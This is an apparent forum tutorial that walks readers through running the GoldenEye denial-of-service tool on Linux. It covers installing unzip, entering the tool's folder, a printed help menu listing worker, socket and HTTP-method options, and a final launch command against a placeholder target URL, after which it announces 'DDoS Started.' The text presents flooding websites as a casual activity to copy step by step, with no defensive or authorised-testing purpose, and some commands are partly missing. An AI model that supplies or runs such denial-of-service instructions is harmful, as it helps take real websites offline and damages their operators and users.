Strongest DDoS tool for Linux and Tutorial how to use it .

Hello guys .

Today i am going to show you how to ddos using a ddos tool named GoldenEye.

Requirements :-
Internet Connection
Linux OS (Ubuntu Recommanded)

Follow me and do as i do .

apt-get install unzip
For CentOS type
yum install unzip

Now type

Let's Unzip

Let's enter the directory of DDoSer
cd GoldenEye-master

Now let's see the help menu

GoldenEye v2.1 by Jan Seidl <>
 USAGE: ./ <url> [OPTIONS]
         Flag                   Description                                             Default
         -u, --useragents       File with user-agents to use                            (default: randomly generated)
         -w, --workers          Number of concurrent workers                            (default: 10)
         -s, --sockets          Number of concurrent sockets                            (default: 500)
         -m, --method           HTTP Method to use 'get' or 'post'  or 'random'         (default: get)
         -d, --debug            Enable Debug Mode [more verbose output]                 (default: False)
         -h, --help             Shows this help

Now Let's operate

./ http://target.tld -w 50 -s 500

And Press enter now.

DDoS Started.

If You need any help then tell me


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